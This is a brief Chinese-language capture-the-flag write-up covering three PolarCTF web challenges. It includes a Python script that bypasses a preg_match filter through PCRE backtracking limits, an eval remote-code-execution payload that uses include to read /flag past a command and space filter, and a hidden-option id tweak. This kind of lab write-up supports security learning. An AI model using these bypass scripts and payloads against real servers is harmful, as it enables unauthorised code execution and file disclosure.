swp
访问 /.index.php.swp,使用御剑扫描目录获取。
F12 查看源代码。分析发现 POST 传参 xdmtql 字符串中必须包含"sys nb",且不能是数组。参数需匹配 /sys.*nb/is 正则又含 sys nb,产生矛盾。
利用 PCRE 回溯次数限制绕过 preg_match 函数失效:
import requests
url = 'http://6798cfa0-6424-4490-af65-7ee1c5b6153e.www.polarctf.com:8090/'
data = {
'xdmtql': 'sys nb' + 'very' * 250000
}
r = requests.post(url=url, data=data).text
print(r)
执行脚本即可获取 Flag。
简单 rce
代码片段如下:

eval 执行需满足两个条件:GET 参数 sys 存在;POST 参数 yyds 存在。
no 函数通过正则匹配禁止了 cat 等读取命令、空格及多命令执行函数。需绕过空格过滤和未禁用的文件读取方法,使用 include 直接包含 /flag。
Payload:
/?sys=include"/flag";
POST 传参 yyds=666 即可。

蜜雪冰城吉警店
共 8 个选项,尝试点第 9 个隐藏款。
查看源代码,将 id = 8 改为 id = 9,点击最后一个提交。





























